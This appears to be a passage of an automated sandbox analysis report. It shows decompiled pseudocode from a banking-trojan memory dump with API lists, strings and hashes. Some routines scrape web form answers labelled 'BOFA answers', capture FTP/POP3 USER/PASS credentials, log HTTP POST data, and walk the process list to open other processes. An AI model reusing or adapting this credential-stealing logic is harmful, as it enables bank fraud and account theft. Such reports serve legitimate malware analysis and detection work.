    																		if(_t206 == 0x2a) {
    																			_t163 = _v20;
    																			_t82 = _t163 + 1; // 0x12
    																			_t206 = _t82;
    																			__eflags = _t82 - 0x10;
    																			if(__eflags != 0) {
    																				__eflags = _t228 - _v8;
    																				if(__eflags >= 0) {
    																					goto L91;
    																				}
    																				_v24 = 0xf;
    																				_t87 =  &_v24;
    																				 *_t87 = _v24 - _t163;
    																				__eflags =  *_t87;
    																				_t89 = _t163 + "<input *value=\""; // 0x4036e2
    																				_t199 = _t89;
    																				while(1) {
    																					_t218 = _v24;
    																					_t206 = _t199;
    																					_t168 = E00408C0D(_t199, _v24, _t228 + _t236, _v8 - _t228,  &_v16, 0, 0);
    																					__eflags = _t168;
    																					if(_t168 != 0) {
    																						break;
    																					}
    																					_t228 = _t228 + 1;
    																					__eflags = _t228 - _v8;
    																					if(__eflags < 0) {
    																						continue;
    																					}
    																					goto L91;
    																				}
    																				_t95 =  &_v16;
    																				 *_t95 = _v16 + _t228;
    																				__eflags =  *_t95;
    																				_t196 = _v40;
    																				L82:
    																				_t169 = _v16;
    																				_v8 = _v8 - _t169;
    																				_t237 = _t236 + _t169;
    																				_t206 = _v8 + _t237;
    																				_t170 = _t237;
    																				if(_t237 >= _t206) {
    																					L85:
    																					if(_t170 == _t206) {
    																						goto L91;
    																					}
    																					_t206 = _t170 - _t237;
    																					if(_t170 - _t237 > 0x200) {
    																						goto L91;
    																					}
    																					 *_t170 = 0;
    																					_t173 =  *0x412a64; // 0x246f5a8
    																					_t175 = wnsprintfA( &_v1064, 0x400,  *(_t173 + 0x148), (_v9 & 0x000000ff) + 1, _t196, (_v9 & 0x000000ff) + 1, _t237);
    																					_t229 = _t175;
    																					_t240 = _t240 + 0x1c;
    																					_t238 = _t175 + _v32;
    																					_t178 = E0040CEF9(_t238 + 0xa, _v28);
    																					if(_t178 == 0) {
    																						E0040CF40(_v28);
    																						_t118 =  &_v32;
    																						 *_t118 = _v32 & 0x00000000;
    																						__eflags =  *_t118;
    																						goto L91;
    																					}
    																					goto L88;
    																				}
    																				while( *_t170 != 0x22) {
    																					_t170 = _t170 + 1;
    																					if(_t170 < _t206) {
    																						continue;
    																					}
    																					goto L85;
    																				}
    																				goto L85;
    																			}
    																			_v16 = _v8;
    																			goto L82;
    																		}
    																		_t182 =  *_t218;
    																		__eflags = _t182 - 0x41;
    																		if(_t182 < 0x41) {
    																			L70:
    																			_t183 = _t182;
    																			L71:
    																			__eflags = _t206 - _t183;
    																			if(__eflags != 0) {
    																				goto L91;
    																			}
    																			goto L72;
    																		}
    																		__eflags = _t182 - 0x5a;
    																		if(_t182 > 0x5a) {
    																			goto L70;
    																		}
    																		_t183 = _t182 + 0x20;
    																		goto L71;
    																	} else {
    																		if(_t228 == _v8) {
    																			goto L91;
    																		}
    																	}
    																	L72:
    																	_t228 = _t228 + 1;
    																	_t218 = _t218 + 1;
    																	_v20 =  &(_v20[1]);
    																} while (_v20 != 0x10);
    																_v16 = _t228;
    																goto L82;
    															}
    															while( *_t159 != 0x3c) {
    																_t159 = _t159 + 1;
    																if(_t159 < _t206) {
    																	continue;
    																}
    																goto L58;
    															}
    															goto L58;
    														}
    														_v16 = _v8;
    														goto L51;
    													}
    													_t186 =  *_t218;
    													__eflags = _t186 - 0x41;
    													if(_t186 < 0x41) {
    														L39:
    														_t187 = _t186;
    														L40:
    														__eflags = _t206 - _t187;
    														if(__eflags != 0) {
    															goto L91;
    														}
    														goto L41;
    													}
    													__eflags = _t186 - 0x5a;
    													if(_t186 > 0x5a) {
    														goto L39;
    													}
    													_t187 = _t186 + 0x20;
    													goto L40;
    												} else {
    													if(_t235 == _v8) {
    														L91:
    														_t282 = _v32;
    														if(_v32 != 0) {
    															E00410EC7(_t206, _t218, _t282, 0xc9, 0, 0, L"BOFA answers:\n\n%S", _v28);
    															E0040CF40(_v28);
    														}
    														goto L93;
    													}
    												}
    												L41:
    												_t235 = _t235 + 1;
    												_t218 = _t218 + 1;
    												_t226 = _t226 + 1;
    											} while (_t226 != 0x12);
    											_v16 = _t235;
    											goto L51;
    											L88:
    											_t206 = _v32 + _t178;
    											_v28 = _t178;
    											_t180 = E0040CF7C(_v32 + _t178,  &_v1064, _t229);
    											_v9 = _v9 + 1;
    											_v32 = _t238;
    											 *((char*)(_t180 + _t238)) = 0;
    										} while (_v9 < 3);
    										goto L91;
    									}
    									_v16 = _v8;
    									goto L28;
    								}
    								_t190 =  *_t233;
    								__eflags = _t190 - 0x41;
    								if(_t190 < 0x41) {
    									L16:
    									_t191 = _t190;
    									L17:
    									__eflags = _t203 - _t191;
    									if(__eflags != 0) {
    										goto L93;
    									}
    									goto L18;
    								}
    								__eflags = _t190 - 0x5a;
    								if(_t190 > 0x5a) {
    									goto L16;
    								}
    								_t191 = _t190 + 0x20;
    								goto L17;
    							} else {
    								if(_t194 == _v8) {
    									L93:
    									E0040CF40(_v36);
    									goto L94;
    								}
    							}
    							L18:
    							_t194 = _t194 + 1;
    							_t233 = _t233 + 1;
    							_t216 = _t216 + 1;
    						} while (_t216 != 9);
    						_v16 = _t194;
    						goto L28;
    					}
    				}
    				return E0040CF40(_a4);
    			}

    APIs
    • lstrcpy.KERNEL32(?,?), ref: 0040A35D
    • lstrcpy.KERNEL32(?,?), ref: 0040A394
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 0040A3AB
    • InternetOpenUrlA.WININET(00000000,0000002F,00000000,00000000,84043300,00000000), ref: 0040A3C9
    • wnsprintfA.SHLWAPI ref: 0040A6EE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: InternetOpenlstrcpy$wnsprintf
    • String ID: *<input *value="$*<option selected$*<select $/$BOFA answers:%S
    • API String ID: 3861095738-10845715
    • Opcode ID: beb117f57832040d7a003db7cf1a0be587a4824c84bba778cbc4f74d0bbcf423
    • Instruction ID: 62f4277ad54571159e7ca5874afd36bd0039eee741a0e52402f6040435e6209f
    • Opcode Fuzzy Hash: beb117f57832040d7a003db7cf1a0be587a4824c84bba778cbc4f74d0bbcf423
    • Instruction Fuzzy Hash: B3D1AF71A00209AFDF20CFA8C984BFEB7B5FB45304F14847BD541B7281D7789A668B5A
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • RtlEnterCriticalSection.NTDLL(00412E1C), ref: 0040C18F
    • ResetEvent.KERNEL32(?), ref: 0040C1BD
    • SetEvent.KERNEL32(?), ref: 0040C1FF
    • RtlLeaveCriticalSection.NTDLL(00412E1C), ref: 0040C206
    • InternetQueryOptionA.WININET(?,0000002D,00000000,?), ref: 0040C22F
    • InternetSetOptionA.WININET(?,0000002D,00000000,00000004), ref: 0040C245
    • RtlLeaveCriticalSection.NTDLL(00412E1C), ref: 0040C252
    • InternetReadFile.WININET(?,?,?,?), ref: 0040C26A
    • InternetReadFileExA.WININET(?,?,?,?), ref: 0040C284
    • InternetReadFileExW.WININET(?,?,?,?), ref: 0040C298
    • InternetQueryDataAvailable.WININET(?,?,?,?), ref: 0040C2A6
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Internet$CriticalFileReadSection$EventLeaveOptionQuery$AvailableDataEnterReset
    • String ID:
    • API String ID: 830436639-0
    • Opcode ID: 65432b94355bdd76ec19613376c30a5daba110173d2da11cce4b4a19b3387233
    • Instruction ID: 6600c66c4eeaa57c0f761191466cd4c661b328488be23d608169a2ad0b675bea
    • Opcode Fuzzy Hash: 65432b94355bdd76ec19613376c30a5daba110173d2da11cce4b4a19b3387233
    • Instruction Fuzzy Hash: D9418B71900208FFDF169F90DD88ADA3F36FF04350F10826AF911A65A1C379D9A1DB94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E004085E6() {
    				void* _v8;
    				char _v12;
    				intOrPtr _v16;
    				int _v20;
    				short _v544;
    				long _v572;
    				void* _v580;
    				void* __edi;
    				intOrPtr _t20;
    				void* _t25;
    				void* _t26;
    				intOrPtr _t28;
    				void* _t30;
    				void* _t36;
    				void* _t38;
    
    				_t20 =  *0x412a64; // 0x246f5a8
    				_v16 = E00409266(0,  *((intOrPtr*)(_t20 + 0x2c)), 4, 0, 0, 0, 0);
    				_t36 = GetCurrentThread();
    				_v20 = GetThreadPriority(_t36);
    				SetThreadPriority(_t36, 1);
    				_v12 = 3;
    				do {
    					_v580 = 0x22c;
    					_t25 = CreateToolhelp32Snapshot(2, 0);
    					_t37 =  &_v580;
    					_v8 = _t25;
    					Process32FirstW(_t25,  &_v580);
    					while(_t25 != 0) {
    						_t26 = _v572;
    						__eflags = _t26;
    						if(_t26 != 0) {
    							__eflags = _t26 -  *0x412ba0; // 0x17c0
    							if(__eflags != 0) {
    								__eflags = _t26 - _v16;
    								if(_t26 != _v16) {
    									_t28 =  *0x412a64; // 0x246f5a8
    									_t30 = lstrcmpiW( &_v544,  *(_t28 + 0x50));
    									__eflags = _t30;
    									if(_t30 != 0) {
    										_t38 = OpenProcess(0x43a, 0, _v572);
    										__eflags = _t38;
    										if(_t38 != 0) {
    											_push(_v572);
    											E00406CBE(_t37, _t38);
    											CloseHandle(_t38);
    										}
    									}
    								}
    							}
    						}
    						_t25 = Process32NextW(_v8,  &_v580);
    					}
    					CloseHandle(_v8);
    					_t17 =  &_v12;
    					 *_t17 = _v12 - 1;
    				} while ( *_t17 != 0);
    				return SetThreadPriority(_t36, _v20);
    			}

    APIs
      • Part of subcall function 00409266: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 004092BB
      • Part of subcall function 00409266: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 004092D6
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,00000000), ref: 004092F2
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040930B
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 00409325
      • Part of subcall function 00409266: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040933E
      • Part of subcall function 00409266: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040935B
    • GetCurrentThread.KERNEL32 ref: 0040860A
    • GetThreadPriority.KERNEL32(00000000), ref: 00408613
    • SetThreadPriority.KERNEL32(00000000,00000001), ref: 0040861F
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00408639
    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040864A
    • lstrcmpiW.KERNEL32(?,?), ref: 00408678
    • OpenProcess.KERNEL32(0000043A,00000000,?), ref: 0040868E
    • CloseHandle.KERNEL32(00000000), ref: 004086A6
    • Process32NextW.KERNEL32(?,0000022C), ref: 004086B6
    • CloseHandle.KERNEL32(?), ref: 004086C3
    • SetThreadPriority.KERNEL32(00000000,?), ref: 004086D6
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Thread$HandlePriorityWrite$CloseCreateProcess32Read$CurrentFirstNamedNextOpenPipeProcessSnapshotStateToolhelp32lstrcmpi
    • String ID:
    • API String ID: 2830737922-0
    • Opcode ID: 8951a03c2d31b1ab908ca8fa1dbaff33716ad3ebc9fde356d2d63f61b29fe255
    • Instruction ID: 9a9bd4c2afa24e14eef20e971ad9867caeee014da293db9c704cd86f811b27c4
    • Opcode Fuzzy Hash: 8951a03c2d31b1ab908ca8fa1dbaff33716ad3ebc9fde356d2d63f61b29fe255
    • Instruction Fuzzy Hash: EF210E71900114AFDB206FA1EE4DADEBF79FF04754F0044A6F509E2161DBB99A60CF58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E0040CAFC(void* __eax, int _a4, int _a8) {
    				int _v24;
    				signed char _v28;
    				signed char _v29;
    				signed char _v30;
    				signed char _v31;
    				signed int _v32;
    				signed int _v34;
    				int _v36;
    				char _v37;
    				char _v49;
    				void* __esi;
    				int _t74;
    				void* _t75;
    				intOrPtr _t76;
    				int _t82;
    				int _t85;
    				int _t97;
    				int _t99;
    				int _t101;
    				int _t103;
    				int _t105;
    				int _t107;
    				void* _t108;
    				int _t109;
    				int _t116;
    				int _t127;
    				signed int _t128;
    				char* _t133;
    				intOrPtr _t134;
    				int _t140;
    				int _t147;
    				int _t149;
    				intOrPtr _t151;
    				int _t154;
    				int _t157;
    
    				_t74 = __eax;
    				_t149 = _a8;
    				_t154 = __eax;
    				if(( *0x412af8 & 0x00000002) == 0) {
    					L3:
    					__eflags = _t149 - 3;
    					if(_t149 < 3) {
    						L73:
    						return _t74;
    					}
    					__eflags = _t154;
    					if(_t154 == 0) {
    						goto L73;
    					}
    					__eflags = _a4;
    					if(_a4 == 0) {
    						goto L73;
    					}
    					_t75 =  *_t154;
    					_v28 = 0;
    					_v32 = 0;
    					__eflags = _t75 - 0x55;
    					if(_t75 != 0x55) {
    						L12:
    						__eflags = _t75 - 0x50;
    						if(_t75 != 0x50) {
    							while(1) {
    								L41:
    								__eflags = _t149 - 1;
    								if(_t149 <= 1) {
    									break;
    								}
    								_t76 =  *((intOrPtr*)(_t154 + _t149 - 1));
    								__eflags = _t76 - 0xd;
    								if(_t76 == 0xd) {
    									L40:
    									_t149 = _t149 - 1;
    									__eflags = _t149;
    									continue;
    								}
    								__eflags = _t76 - 0xa;
    								if(_t76 != 0xa) {
    									break;
    								}
    								goto L40;
    							}
    							_t74 = _t149 - 3;
    							__eflags = _t74 - 1;
    							if(_t74 > 1) {
    								goto L73;
    							}
    							 *0x412dd4(0x412e34);
    							_t127 = E0040C9C5(_a4);
    							_v32 = _t127;
    							__eflags = _t127;
    							if(_t127 == 0) {
    								L72:
    								_t74 =  *0x412dd8(0x412e34);
    								goto L73;
    							}
    							__eflags =  *(_t127 + 4);
    							if( *(_t127 + 4) == 0) {
    								L70:
    								_push(0);
    								L71:
    								E0040CA5A(_t127);
    								goto L72;
    							}
    							__eflags =  *(_t127 + 8);
    							if( *(_t127 + 8) == 0) {
    								goto L70;
    							}
    							__eflags = _t149 - 3;
    							if(_t149 != 3) {
    								_t128 = 4;
    								__eflags = _t149 - _t128;
    								if(_t149 != _t128) {
    									goto L72;
    								}
    								_t151 =  *0x412a64; // 0x246f5a8
    								_t141 = _t128;
    								_t82 = E0040D3EC(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x128)));
    								__eflags = _t82;
    								if(_t82 == 0) {
    									L56:
    									_v37 = 1;
    									L60:
    									_t127 = _v28;
    									L61:
    									_v28 = 0x10;
    									_t85 =  *0x412bc8(_a4,  &_v24,  &_v28);
    									__eflags = _t85;
    									if(_t85 != 0) {
    										L65:
    										__eflags = _v49 - 2;
    										if(_v49 != 2) {
    											L68:
    											_push(0);
    											goto L71;
    										}
    										_t133 = "pop3";
    										L67:
    										_push((_v34 & 0xff) << 0x00000008 | (_v34 & 0x0000ffff) >> 0x00000008);
    										_push(_v29 & 0x000000ff);
    										_push(_v30 & 0x000000ff);
    										_push(_v31 & 0x000000ff);
    										_push(_v32 & 0x000000ff);
    										_push( *(_t127 + 8));
    										_push( *(_t127 + 4));
    										__eflags = _v49 - 1;
    										__eflags = (_v49 != 1) + 0x64;
    										E00410EC7(_t133, (_v34 & 0xff) << 0x00000008 | (_v34 & 0x0000ffff) >> 0x00000008, (_v49 != 1) + 0x64, (_v49 != 1) + 0x64, 0, 0, L"%S://%S:%S@%u.%u.%u.%u:%u/", _t133);
    										goto L68;
    									}
    									_t97 = E00406114( &_v36);
    									__eflags = _t97;
    									if(_t97 != 0) {
    										goto L65;
    									}
    									__eflags = _v49 - 1;
    									if(_v49 != 1) {
    										goto L65;
    									}
    									_t134 =  *0x412a64; // 0x246f5a8
    									_t99 = E0040D3EC(_t141 | 0xffffffff,  *((intOrPtr*)(_t134 + 0x13c)), _t141 | 0xffffffff,  *(_t127 + 4));
    									__eflags = _t99;
    									if(_t99 != 0) {
    										_t133 = "ftp";
    										goto L67;
    									}
    									goto L65;
    								}
    								_t141 = _t128;
    								_t101 = E0040D3EC(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x12c)));
    								__eflags = _t101;
    								if(_t101 == 0) {
    									goto L56;
    								}
    								_t141 = _t128;
    								_t103 = E0040D3EC(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x130)));
    								__eflags = _t103;
    								if(_t103 != 0) {
    									_t141 = _t128;
    									_t105 = E0040D3EC(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x134)));
    									__eflags = _t105;
    									if(_t105 == 0) {
    										L59:
    										_v37 = 2;
    										goto L60;
    									}
    									_t141 = _t128;
    									_t107 = E0040D3EC(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x138)));
    									__eflags = _t107;
    									if(_t107 != 0) {
    										goto L72;
    									}
    									goto L59;
    								}
    								goto L56;
    							}
    							_t108 =  *_t154;
    							__eflags = _t108 - 0x43;
    							if(_t108 == 0x43) {
    								L49:
    								__eflags =  *((char*)(_t154 + 1)) - 0x57;
    								if( *((char*)(_t154 + 1)) != 0x57) {
    									goto L72;
    								}
    								__eflags =  *((char*)(_t154 + 2)) - 0x44;
    								if( *((char*)(_t154 + 2)) != 0x44) {
    									goto L72;
    								}
    								_v37 = 1;
    								goto L61;
    							}
    							__eflags = _t108 - 0x50;
    							if(_t108 != 0x50) {
    								goto L72;
    							}
    							goto L49;
    						}
    						__eflags =  *((char*)(_t154 + 1)) - 0x41;
    						if( *((char*)(_t154 + 1)) != 0x41) {
    							goto L41;
    						}
    						__eflags =  *((char*)(_t154 + 2)) - 0x53;
    						if( *((char*)(_t154 + 2)) != 0x53) {
    							goto L41;
    						}
    						__eflags =  *((char*)(_t154 + 3)) - 0x53;
    						if( *((char*)(_t154 + 3)) != 0x53) {
    							goto L41;
    						}
    						__eflags =  *((char*)(_t154 + 4)) - 0x20;
    						if( *((char*)(_t154 + 4)) != 0x20) {
    							goto L41;
    						} else {
    							_v28 = 5;
    							L18:
    							_t18 = _t149 - _v32 + 1; // 0x6
    							_t74 = _t18;
    							__eflags = _t74;
    							if(_t74 == 0) {
    								goto L73;
    							}
    							_t74 = E0040CF2D(_t74);
    							_t147 = _t74;
    							_v24 = _t147;
    							__eflags = _t147;
    							if(_t147 == 0) {
    								goto L73;
    							}
    							_t140 = _v32;
    							__eflags = _t140;
    							if(_t140 == 0) {
    								_t140 = _v28;
    							}
    							while(1) {
    								__eflags = _t140 - _t149;
    								if(_t140 >= _t149) {
    									break;
    								}
    								_t109 =  *((intOrPtr*)(_t140 + _t154));
    								__eflags = _t109 - 0xa;
    								if(_t109 != 0xa) {
    									__eflags = _t109 - 0xd;
    									if(_t109 != 0xd) {
    										__eflags = _t109;
    										if(_t109 != 0) {
    											 *_t147 = _t109;
    										}
    									}
    								}
    								_t140 = _t140 + 1;
    								_t147 = _t147 + 1;
    								__eflags = _t147;
    							}
    							 *0x412dd4(0x412e34);
    							__eflags = _v36;
    							if(_v36 == 0) {
    								__eflags = _v32;
    								if(_v32 == 0) {
    									L37:
    									 *0x412dd8(0x412e34);
    									_t74 = E0040CF40(_v32);
    									goto L73;
    								}
    								_t157 = E0040C9C5(_a4);
    								__eflags = _t157;
    								if(_t157 == 0) {
    									goto L37;
    								}
    								E0040CF40( *(_t157 + 8));
    								__eflags = _a8 - _v36;
    								_t116 = E0040D0D5(_a8 - _v36, _v32);
    								 *(_t157 + 8) = _t116;
    								L35:
    								__eflags = _t116;
    								if(_t116 == 0) {
    									E0040CA5A(_t157, _t116);
    								}
    								goto L37;
    							}
    							_t157 = E0040C9C5(_a4);
    							__eflags = _t157;
    							if(_t157 != 0) {
    								L31:
    								E0040CA5A(_t157, 1);
    								 *_t157 = _a4;
    								_t116 = E0040D0D5(_t130, _v32);
    								 *(_t157 + 4) = _t116;
    								goto L35;
    							}
    							_t157 = E0040C9FD(_a4);
    							__eflags = _t157;
    							if(_t157 == 0) {
    								goto L37;
    							}
    							goto L31;
    						}
    					}
    					__eflags =  *((char*)(_t154 + 1)) - 0x53;
    					if( *((char*)(_t154 + 1)) != 0x53) {
    						goto L12;
    					}
    					__eflags =  *((char*)(_t154 + 2)) - 0x45;
    					if( *((char*)(_t154 + 2)) != 0x45) {
    						goto L12;
    					}
    					__eflags =  *((char*)(_t154 + 3)) - 0x52;
    					if( *((char*)(_t154 + 3)) != 0x52) {
    						goto L12;
    					}
    					__eflags =  *((char*)(_t154 + 4)) - 0x20;
    					if( *((char*)(_t154 + 4)) != 0x20) {
    						goto L12;
    					} else {
    						_v32 = 5;
    						goto L18;
    					}
    				}
    				_t74 = IsBadHugeWritePtr(__eax, _t149);
    				if(_t74 != 0) {
    					goto L3;
    				} else {
    					_t74 = E0040CFFE(E0040DF51(0xff, _t74), _t154, _t124, _t149);
    					goto L73;
    				}
    			}

    APIs
    • IsBadHugeWritePtr.KERNEL32(?,?), ref: 0040CB18
    • RtlEnterCriticalSection.NTDLL(00412E34), ref: 0040CC0D
    • RtlLeaveCriticalSection.NTDLL(00412E34), ref: 0040CC8D
    • RtlEnterCriticalSection.NTDLL(00412E34), ref: 0040CCC4
    • getpeername.WS2_32(?), ref: 0040CDC8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$Enter$HugeLeaveWritegetpeername
    • String ID: %S://%S:%S@%u.%u.%u.%u:%u/$ftp$pop3
    • API String ID: 133427328-3711411108
    • Opcode ID: 999ed23411a69ab54b3fcc6eaf88037fc7a5798dd97aa0defd1db77dec703553
    • Instruction ID: 82fc01ed63dc4dd93b4ee8b747fb204174c656f27e0997f11a1d1815cea37a59
    • Opcode Fuzzy Hash: 999ed23411a69ab54b3fcc6eaf88037fc7a5798dd97aa0defd1db77dec703553
    • Instruction Fuzzy Hash: 16A1E170608241DAEB219F25C9C476BBAD55F55308F04863FF889A62D2C73CCD8AD79A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00409266(void* __eflags, long _a4, void _a8, void** _a12, long* _a16, void _a20, void _a24) {
    				char _v5;
    				void _v12;
    				short _v532;
    				long* _t67;
    				void** _t69;
    				long _t70;
    				void* _t71;
    				long _t73;
    				void* _t74;
    
    				_v12 = _v12 | 0xffffffff;
    				_v5 = 1;
    				E00408F6C( &_v532, _a4);
    				while(1) {
    					_t71 = CreateFileW( &_v532, 0xc0000000, 3, 0, 3, 0, 0);
    					if(_t71 != 0xffffffff) {
    						break;
    					}
    					if(_v5 != 0) {
    						WaitNamedPipeW( &_v532, 0xffffffff);
    						_v5 = 0;
    						continue;
    					}
    					L23:
    					return _v12;
    				}
    				_a4 = 2;
    				if(SetNamedPipeHandleState(_t71,  &_a4, 0, 0) != 0) {
    					_push(0);
    					_push( &_a4);
    					_t73 = 4;
    					if(WriteFile(_t71,  &_a8, _t73, ??, ??) != 0 && WriteFile(_t71,  &_a24, _t73,  &_a4, 0) != 0 && WriteFile(_t71, _a20, _a24,  &_a4, 0) != 0 && ReadFile(_t71,  &_v12, _t73,  &_a4, 0) != 0 && _a4 == _t73) {
    						_a20 = 0;
    						if(ReadFile(_t71,  &_a20, _t73,  &_a4, 0) == 0 || _a4 != _t73) {
    							_v12 = _v12 | 0xffffffff;
    						} else {
    							_t62 = _a20;
    							if(_a20 > 0) {
    								_t74 = E0040CF2D(_t62);
    								if(_t74 == 0 || ReadFile(_t71, _t74, _a20,  &_a4, 0) == 0) {
    									L19:
    									_v12 = _v12 | 0xffffffff;
    									goto L20;
    								} else {
    									_t70 = _a20;
    									if(_t70 != _a4) {
    										goto L19;
    									} else {
    										_t69 = _a12;
    										if(_t69 == 0) {
    											L20:
    											E0040CF40(_t74);
    										} else {
    											_t67 = _a16;
    											if(_t67 == 0) {
    												goto L20;
    											} else {
    												 *_t69 = _t74;
    												 *_t67 = _t70;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				CloseHandle(_t71);
    				goto L23;
    			}


    APIs
      • Part of subcall function 00408F6C: lstrcpyW.KERNEL32(?,\\.\pipe\), ref: 00408F75
      • Part of subcall function 00408F6C: lstrcpyW.KERNEL32(?,?), ref: 00408F83
    • WaitNamedPipeW.KERNEL32(?,000000FF,?,?,00000000), ref: 004092A3
    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 004092BB
    • SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 004092D6
    • WriteFile.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,00000000), ref: 004092F2
    • WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040930B
    • WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 00409325
    • ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040933E
    • ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040935B
    • ReadFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 00409386
      • Part of subcall function 0040CF40: HeapFree.KERNEL32(00000000,00000000,0040958E,00000000,00000001), ref: 0040CF53
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 004093BD
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$ReadWrite$HandleNamedPipelstrcpy$CloseCreateFreeHeapStateWait
    • String ID:
    • API String ID: 34731080-0
    • Opcode ID: acf49d5069829d18e8d055bb5ab940e12132ee8fc100e9ae9a6354386905a5a4
    • Instruction ID: 793387bd3e43ffc3ab524ebef3089776e3cbd20682da619de251a1ee892e55a9
    • Opcode Fuzzy Hash: acf49d5069829d18e8d055bb5ab940e12132ee8fc100e9ae9a6354386905a5a4
    • Instruction Fuzzy Hash: 80412BB2100109BBDF219FA4DC84DEF3B6CAB49350F10853AFE51E62D1E7788E558BA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0040C32A(signed short __edx, char* __esi, intOrPtr _a4) {
    				long _v8;
    				signed int _v12;
    				void* _v16;
    				intOrPtr _v20;
    				int _v60;
    				char* _v64;
    				void _v72;
    				void* _v80;
    				char _v340;
    				void _v1364;
    				void* __ebx;
    				char _t70;
    				char _t72;
    				signed int _t82;
    				signed int _t97;
    				char* _t98;
    				intOrPtr _t109;
    				int _t119;
    				short _t120;
    				signed int _t121;
    				long _t126;
    				long _t128;
    				int _t129;
    				signed int _t130;
    				char _t131;
    				intOrPtr _t132;
    				char* _t135;
    				intOrPtr _t140;
    				void* _t141;
    				intOrPtr* _t143;
    				char* _t145;
    				void* _t146;
    
    				_t145 = __esi;
    				_t138 = __edx;
    				_v12 = _v12 | 0xffffffff;
    				_t149 = __esi[0x414];
    				if(__esi[0x414] == 0) {
    					L25:
    					_t70 = _t145[0x41c];
    					if(_t70 > 0xea60) {
    						L55:
    						return 1;
    					}
    					if(_v12 != 0xffff) {
    						L31:
    						_t72 = _t145[0x41c];
    						_t126 = 0;
    						if(_t72 <= 0) {
    							L41:
    							_v16 = 0;
    							_v12 = 0;
    							_t140 = 0xc;
    							if(_t145[4] != 0x73 || _t145[5] != 0x3a) {
    								L44:
    								_v20 = 0xb;
    								goto L45;
    							} else {
    								_v20 = _t140;
    								if(_t145[6] == 0x2f) {
    									L45:
    									_push( &_v16);
    									_push( &_v12);
    									E00405622();
    									if(_v20 == _t140) {
    										 *0x412dd4(0x412e1c);
    										E0040A9FB(_t138, _a4, _t145,  &_v12,  &_v16);
    										 *0x412dd8(0x412e1c);
    									}
    									_v8 = 0x3ff;
    									if(HttpQueryInfoA(_t145[0x420], 0x80000023,  &_v1364,  &_v8, 0) == 0 || _v8 == 0) {
    										_v8 = 1;
    										_v1364 = 0x2d;
    									}
    									 *((char*)(_t146 + _v8 - 0x550)) = 0;
    									_t141 = E0040D379(_t145[0x400], _t145);
    									_t82 = 0x40377c;
    									_t130 = _t126;
    									if(_t126 == 0) {
    										_t130 = 0x40377c;
    									}
    									_t177 = _v12;
    									if(_v12 != 0) {
    										_t82 = _v12;
    									}
    									_push(_t130);
    									_push(_t82);
    									_push( &_v1364);
    									E00410EC7(_t130, _t138, _t177, _v20, _t141, 0, L"%S\nReferer: %S\n%SData:\n\n%S", _t145);
    									E0040CF40(_t141);
    									E0040CF40(_v12);
    									E0040CF40(_t126);
    									goto L55;
    								}
    								goto L44;
    							}
    						}
    						_t93 = _t72 + 1;
    						if(_t72 + 1 == 0) {
    							goto L55;
    						}
    						_t126 = E0040CF2D(_t93);
    						if(_t126 == 0) {
    							goto L55;
    						}
    						E0040CF7C(_t126, _t145[0x418], _t145[0x41c]);
    						 *((char*)(_t126 + _t145[0x41c])) = 0;
    						_t138 = 0;
    						if(_t145[0x41c] <= 0) {
    							goto L41;
    						}
    						_t97 = 0;
    						do {
    							_t98 = _t97 + _t126;
    							_t131 =  *_t98;
    							if(_t131 != 0x26) {
    								__eflags = _t131 - 0x2b;
    								if(_t131 == 0x2b) {
    									 *_t98 = 0x20;
    								}
    							} else {
    								 *_t98 = 0xa;
    							}
    							_t138 = _t138 + 1;
    							_t97 = _t138 & 0x0000ffff;
    						} while (_t97 < _t145[0x41c]);
